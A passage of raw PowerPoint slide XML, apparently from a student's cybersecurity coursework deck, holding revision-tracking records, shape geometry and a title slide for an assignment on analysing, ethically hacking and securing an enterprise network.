        <pc:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:11:12.781" v="285" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3592852376" sldId="269"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new del mod">
        <pc:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T11:56:48.879" v="821" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2014317309" sldId="270"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T11:42:12.518" v="785" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2014317309" sldId="270"/>
            <ac:spMk id="7" creationId="{8C1BF821-C7FC-2A57-8299-60EFFEF0B6CF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T11:56:42.624" v="820" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2014317309" sldId="270"/>
            <ac:spMk id="9" creationId="{E414E2D2-5B8F-820D-6BEA-C1A5178DBC1E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T11:56:38.436" v="818" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2014317309" sldId="270"/>
            <ac:spMk id="13" creationId="{9B62A378-4FB8-AD7A-53C1-D3217E91B5A9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T11:42:58.720" v="796" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2014317309" sldId="270"/>
            <ac:spMk id="15" creationId="{505B84E4-80E0-C5A8-BA15-22095D7FBD59}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T11:56:40.088" v="819" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2014317309" sldId="270"/>
            <ac:spMk id="19" creationId="{03B2EAB7-EB00-1F77-A7BF-43430E05DD12}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T11:41:26.245" v="773" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2014317309" sldId="270"/>
            <ac:picMk id="3" creationId="{4454BE1A-15B1-1D4A-5A4B-BB65827A2196}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T11:41:37.550" v="780" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2014317309" sldId="270"/>
            <ac:picMk id="5" creationId="{52883854-CC36-69B3-EBFD-8CE803E50529}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T11:56:34.700" v="815" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2014317309" sldId="270"/>
            <ac:picMk id="11" creationId="{24C024D3-A721-EA9C-D407-E1C4DA0FF431}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T11:56:35.501" v="816" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2014317309" sldId="270"/>
            <ac:picMk id="17" creationId="{EAC1350A-F33F-A530-CE20-53E0EAC769E7}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:11:14.092" v="286" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3498200193" sldId="270"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:11:15.492" v="287" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2742925991" sldId="271"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:11:16.447" v="288" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3186402628" sldId="272"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:11:18.870" v="289" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="227638051" sldId="27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C3CCB-8EB2-4B1F-89FF-73E2C1317356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3EACA-0F03-4517-B0CF-43693EC74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782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3EACA-0F03-4517-B0CF-43693EC743B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12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3EACA-0F03-4517-B0CF-43693EC743B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837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3EACA-0F03-4517-B0CF-43693EC743B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786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3EACA-0F03-4517-B0CF-43693EC743B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18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FDE6A-25CB-A422-ECB3-EB4FFCAE8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ADF399-8FA7-8141-CBD9-1F7C51492B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8D1B32-F61D-E4D4-5E6A-F227D83DD5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7D1D18-0356-677B-4717-66C5C58D34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3EACA-0F03-4517-B0CF-43693EC743B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293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3EACA-0F03-4517-B0CF-43693EC743B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40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3EACA-0F03-4517-B0CF-43693EC743B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68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44339-F1E1-B60C-05D1-1F56EA2BB7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902E69-D064-0E6F-F478-5F3DB5E7A9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B07F4-2EF6-4A2E-1E20-D11924C29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96AFA-39C3-B139-BC1D-4F954056A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4510E-E6F7-C639-7F66-4BD22E2EB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052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9DE2A-9929-E9A1-C12E-C17498BC4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71682-193F-D502-3F10-14B49EA95F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9D9C3-452D-C7AB-2033-83F75C5E5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C57B64-0634-193A-D3EB-649FB5C73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2BEE1-8841-3471-8588-301AB09D2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769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02E58-F030-497C-9D69-419D53F32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05368B-87C1-026F-0D8A-C1CB870F2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AD7167-B103-8E35-D051-9F4090EAA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E7D4CF-ACD1-CB17-9E48-E991E08AE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165EB-679A-A895-3AD0-21671C4F6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48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BFA9C-C395-81BC-FA41-C92518A4E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403C4-4A39-3AE6-49DA-F2317F5C0C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C316CE-8966-7166-DB1F-24FF65AD4F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57A46-A958-9CEB-72AC-2940E4349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E1197-2F38-CAC4-1824-5E9B1F4D3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FBD5D8-41F5-41A0-A7F9-57AF7C429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098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91299-E9CD-D039-593F-05361B5C8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F067C5-1951-C97B-F91D-78A8CBE67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96D53-4C3D-FDA4-4B16-A9BBD28C3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DC5961-26B9-8030-3193-017CB75332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64F3C5-4483-851D-D2F1-F128C4DA22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FFC0A8-C0BD-22AB-FDA6-4F4388616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748ECC-A5A1-DE98-B02C-8E3414519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03931C-9A3B-AE2E-FD3F-0E7F4D809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939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E50E6-E532-824E-5D80-0E9908A9A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A664B6-8BEB-08C7-8613-E4BFD499F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911EA6-9A88-2D42-352A-CC5504DE0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686D6F-F57F-21EA-D0AE-15107CF78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76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8DC9FA-687A-6E2D-B63D-A0014FFF4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88D6EE-7514-502D-D1AB-B1D96419B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BE497-FFEE-6D8F-AE20-B6773C9F0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016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50F14-02E4-ECD9-2347-2F5357A01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197C9-46F3-578F-13E6-8583BE3A5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4919B-EB77-CDFA-BABA-98E412A29D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D52B1-DD2B-A0F8-FD18-27181E601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A88D70-7AED-748D-8EA5-E40C5834D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36D9EE-2446-EFB5-4B01-61108AEFE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707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EEEA7-8C30-7E84-97F5-88A8D2EFD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D91120-8BCA-6EAE-B2B2-C76E788A53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F59633-2EC8-FB22-48BE-FF03CD8EC3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FBEC1-5E43-8246-6F9D-7AC8A5F5B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8AA6E-94D1-685F-15D5-686997209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71000C-C182-A8FF-D7EF-6A8ADC874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550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E3AC1-CD73-9BF3-8947-4BF1A8233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1F126E-A574-D7B3-3632-3133EC55B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9EF58B-C252-DB80-947E-01984A46C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1B374B-03E1-5A93-A845-BB4DF1DF1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01E15-7AF0-99AC-62C8-62EE7D032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521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48AEB6-397A-A959-B6F7-D3381E622F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525046-103F-D16C-3D59-44FBCE890A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B91117-63FA-4959-BCA7-50E5FA6ED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AEA7E6-EBF0-68EA-5E7C-09F9D5B2A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AF34A5-12C8-5608-8855-01947CCAD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885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A9B69F-C7D2-72CA-F820-E03CE56A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92B0DB-7B1E-1344-AB76-983E1E8EA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776F1-5310-45B8-E927-B90ECEA3C3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407039-F436-4DE1-95AF-54084487D090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6D1E5-7FF0-B689-2A14-576ADB9BA2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5CF53D-B4A4-A4D1-4ADD-3A7749F3C6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011791-3AAE-4243-9261-E1C934262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049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6F5412-FB26-DA02-B416-303D1E4F8A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95276"/>
            <a:ext cx="6862765" cy="1576476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GB" sz="3500" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Network Setup and Connectivity Configuration</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3500" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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581965D-0109-B5A5-D43C-9E039B9E8F8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908453" y="3306756"/>
            <a:ext cx="6080511" cy="16557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 lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="19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rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" altLang="en-US" sz="19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rPr>
              <a:t>Assignment: Analysing, Ethically Hacking and Securing an Enterprise Network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" altLang="en-US" sz="19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rPr>
              <a:t>Name: Andrian Morteanu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" altLang="en-US" sz="19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rPr>
              <a:t>Module: Advanced Cybersecurity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" altLang="en-US" sz="19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rPr>
              <a:t>Student ID: 2242425</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="1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A298AB5-96FC-A829-8321-5FC540CA252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0641"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7115177" y="115193"/>
            <a:ext cx="4950618" cy="6627614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C65C03C-3F17-45DC-A1B9-35ACA43397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15176" y="115193"/>
            <a:ext cx="0" cy="6627614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A4A161CC-6DC5-4863-B213-94529D6E0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238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8" name="Rectangle 127">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79B4B56F-BCC9-4009-91E2-AE49F626B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16AE0BB-D374-D2FE-7B47-129E6DA2D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4" r="1" b="13198"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6" y="3477464"/>
            <a:ext cx="6000749" cy="3380536"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6000749" h="3300478">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="72689" y="17405"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="148479" y="30382"/>
                  <a:pt x="220740" y="46697"/>
                  <a:pt x="296224" y="60096"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="370204" y="73143"/>
                  <a:pt x="437718" y="89378"/>
                  <a:pt x="480347" y="125215"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="499354" y="141006"/>
                  <a:pt x="525380" y="157497"/>
                  <a:pt x="557941" y="163614"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="604343" y="172287"/>
                  <a:pt x="661151" y="169659"/>
                  <a:pt x="711163" y="175552"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="770061" y="182442"/>
                  <a:pt x="837586" y="186026"/>
                  <a:pt x="879547" y="204397"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="916853" y="220789"/>
                  <a:pt x="953852" y="232503"/>
                  <a:pt x="1001114" y="239543"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1034229" y="244449"/>
                  <a:pt x="1060244" y="258297"/>
                  <a:pt x="1094193" y="261385"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1138864" y="265585"/>
                  <a:pt x="1183576" y="267514"/>
                  <a:pt x="1223712" y="278215"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1265353" y="289267"/>
                  <a:pt x="1311848" y="296040"/>
                  <a:pt x="1355116" y="305727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1378077" y="310948"/>
                  <a:pt x="1397486" y="319319"/>
                  <a:pt x="1419784" y="325013"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1460606" y="335426"/>
                  <a:pt x="1502092" y="345368"/>
                  <a:pt x="1543855" y="354703"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1585613" y="364041"/>
                  <a:pt x="1625936" y="376036"/>
                  <a:pt x="1671044" y="380741"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1747929" y="388654"/>
                  <a:pt x="1830544" y="388195"/>
                  <a:pt x="1905503" y="397893"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1981585" y="407807"/>
                  <a:pt x="2054121" y="423516"/>
                  <a:pt x="2122943" y="441264"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2177383" y="455211"/>
                  <a:pt x="2228579" y="469433"/>
                  <a:pt x="2294750" y="471131"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2331675" y="472095"/>
                  <a:pt x="2371411" y="480021"/>
                  <a:pt x="2395406" y="492458"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2447356" y="519599"/>
                  <a:pt x="2511089" y="534865"/>
                  <a:pt x="2582173" y="545492"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2677107" y="559893"/>
                  <a:pt x="2771049" y="575002"/>
                  <a:pt x="2866260" y="588796"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2922428" y="597021"/>
                  <a:pt x="2978373" y="606221"/>
                  <a:pt x="3037154" y="609730"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3157310" y="617134"/>
                  <a:pt x="3279823" y="620612"/>
                  <a:pt x="3400817" y="626198"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3440399" y="627913"/>
                  <a:pt x="3478286" y="633081"/>
                  <a:pt x="3518453" y="633771"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3561907" y="634557"/>
                  <a:pt x="3607885" y="630075"/>
                  <a:pt x="3651342" y="630861"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3723632" y="632064"/>
                  <a:pt x="3794230" y="636720"/>
                  <a:pt x="3866543" y="638109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4006046" y="640675"/>
                  <a:pt x="4145773" y="642266"/>
                  <a:pt x="4285471" y="643671"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4315374" y="643936"/>
                  <a:pt x="4347225" y="639959"/>
                  <a:pt x="4376825" y="640644"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4455420" y="642648"/>
                  <a:pt x="4533819" y="645811"/>
                  <a:pt x="4611883" y="649214"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4659172" y="651342"/>
                  <a:pt x="4705681" y="655657"/>
                  <a:pt x="4753273" y="657363"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4791348" y="658728"/>
                  <a:pt x="4830282" y="658460"/>
                  <a:pt x="4869416" y="657032"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4903113" y="655812"/>
                  <a:pt x="4937685" y="650501"/>
                  <a:pt x="4971133" y="650072"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5061656" y="648862"/>
                  <a:pt x="5151315" y="649288"/>
                  <a:pt x="5241228" y="648921"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5277251" y="648692"/>
                  <a:pt x="5313809" y="647064"/>
                  <a:pt x="5348948" y="648281"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5442983" y="651292"/>
                  <a:pt x="5535908" y="656726"/>
                  <a:pt x="5630171" y="658761"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5708354" y="660446"/>
                  <a:pt x="5788179" y="658309"/>
                  <a:pt x="5867227" y="658360"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5900754" y="658487"/>
                  <a:pt x="5933144" y="660851"/>
                  <a:pt x="5966562" y="660236"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6000749" y="659419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6000749" y="3300478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3300478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8C2BA08-1D46-DEF9-32DD-9F540BC4B7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434" r="1" b="7920"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6191245" y="3477464"/>
            <a:ext cx="6000750" cy="3380536"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6000750" h="3380536">
                <a:moveTo>
                  <a:pt x="6000750" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6000750" y="3380536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3380536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="734920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1093" y="734894"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="43982" y="734250"/>
                  <a:pt x="86046" y="738067"/>
                  <a:pt x="129383" y="735472"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="232305" y="729284"/>
                  <a:pt x="335599" y="720589"/>
                  <a:pt x="438999" y="712634"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="545632" y="704405"/>
                  <a:pt x="651967" y="696598"/>
                  <a:pt x="758502" y="687629"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="816777" y="682526"/>
                  <a:pt x="875042" y="674778"/>
                  <a:pt x="933290" y="669489"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="984350" y="664848"/>
                  <a:pt x="1035368" y="662477"/>
                  <a:pt x="1086504" y="658393"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1130780" y="654718"/>
                  <a:pt x="1175255" y="649883"/>
                  <a:pt x="1219532" y="646211"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1290460" y="640432"/>
                  <a:pt x="1361111" y="635262"/>
                  <a:pt x="1431709" y="629721"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1461215" y="627211"/>
                  <a:pt x="1492576" y="627456"/>
                  <a:pt x="1519665" y="620761"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1587914" y="603847"/>
                  <a:pt x="1656385" y="596155"/>
                  <a:pt x="1725964" y="591136"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1749760" y="589442"/>
                  <a:pt x="1775052" y="585455"/>
                  <a:pt x="1797448" y="579050"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1843314" y="566085"/>
                  <a:pt x="1887378" y="550735"/>
                  <a:pt x="1932321" y="536393"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1937187" y="534756"/>
                  <a:pt x="1943228" y="533703"/>
                  <a:pt x="1948501" y="532386"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1978396" y="524909"/>
                  <a:pt x="2007929" y="517486"/>
                  <a:pt x="2037878" y="510381"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2054084" y="506558"/>
                  <a:pt x="2070836" y="503979"/>
                  <a:pt x="2087074" y="500340"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2149871" y="486094"/>
                  <a:pt x="2221077" y="484809"/>
                  <a:pt x="2272856" y="454575"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2306493" y="435047"/>
                  <a:pt x="2341593" y="433439"/>
                  <a:pt x="2380102" y="430210"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2409255" y="427750"/>
                  <a:pt x="2438805" y="422967"/>
                  <a:pt x="2468101" y="418977"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2519583" y="412197"/>
                  <a:pt x="2571012" y="405050"/>
                  <a:pt x="2622546" y="398641"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2639021" y="396667"/>
                  <a:pt x="2656456" y="398901"/>
                  <a:pt x="2672416" y="395869"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2746162" y="381759"/>
                  <a:pt x="2819618" y="365613"/>
                  <a:pt x="2893417" y="351874"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2935273" y="344015"/>
                  <a:pt x="2978970" y="341367"/>
                  <a:pt x="3020364" y="332819"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3068129" y="322982"/>
                  <a:pt x="3114165" y="308673"/>
                  <a:pt x="3161340" y="297221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3174361" y="294043"/>
                  <a:pt x="3189234" y="293619"/>
                  <a:pt x="3203209" y="292002"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3218968" y="290132"/>
                  <a:pt x="3234424" y="288682"/>
                  <a:pt x="3250157" y="286626"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3298044" y="280172"/>
                  <a:pt x="3345797" y="272792"/>
                  <a:pt x="3393816" y="267263"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3423190" y="263828"/>
                  <a:pt x="3454970" y="267035"/>
                  <a:pt x="3481707" y="260387"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3536267" y="247128"/>
                  <a:pt x="3593313" y="251261"/>
                  <a:pt x="3647214" y="233375"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3663930" y="227969"/>
                  <a:pt x="3688543" y="232010"/>
                  <a:pt x="3709301" y="229426"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3761192" y="222966"/>
                  <a:pt x="3812924" y="215397"/>
                  <a:pt x="3864656" y="207827"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3911037" y="201021"/>
                  <a:pt x="3959597" y="196736"/>
                  <a:pt x="4003477" y="185188"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4049448" y="172966"/>
                  <a:pt x="4091674" y="167696"/>
                  <a:pt x="4137906" y="167519"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4169570" y="167345"/>
                  <a:pt x="4202490" y="163215"/>
                  <a:pt x="4234799" y="159925"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4269635" y="156466"/>
                  <a:pt x="4307277" y="147130"/>
                  <a:pt x="4339561" y="148755"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4435674" y="153547"/>
                  <a:pt x="4532250" y="143733"/>
                  <a:pt x="4630056" y="129778"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4647906" y="127231"/>
                  <a:pt x="4665742" y="122044"/>
                  <a:pt x="4682476" y="116824"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4780053" y="85907"/>
                  <a:pt x="4880569" y="73077"/>
                  <a:pt x="4983755" y="68740"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5005134" y="67956"/>
                  <a:pt x="5028744" y="64966"/>
                  <a:pt x="5049489" y="59740"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5107823" y="44808"/>
                  <a:pt x="5163760" y="25875"/>
                  <a:pt x="5222715" y="12743"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5320150" y="-8899"/>
                  <a:pt x="5409108" y="4464"/>
                  <a:pt x="5499654" y="8541"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5585786" y="12301"/>
                  <a:pt x="5662247" y="37645"/>
                  <a:pt x="5760350" y="15528"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5770235" y="13363"/>
                  <a:pt x="5782015" y="16781"/>
                  <a:pt x="5793267" y="16498"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5824109" y="15685"/>
                  <a:pt x="5855057" y="15611"/>
                  <a:pt x="5885995" y="12898"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5923792" y="9771"/>
                  <a:pt x="5961883" y="3581"/>
                  <a:pt x="5999626" y="83"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="130" name="Group 129">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{770B9411-A26D-4F61-AA38-0B77CFF58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014035"/>
            <a:ext cx="12192000" cy="1203824"/>
            <a:chOff x="0" y="3014035"/>
            <a:chExt cx="12192000" cy="1203824"/>
          </a:xfrm>
        </p:grpSpPr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50B2A89E-A97A-4FA1-9512-8C6F1C60FE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014035"/>
              <a:ext cx="12192000" cy="1203824"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 12192000 w 12192000"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1203824"/>
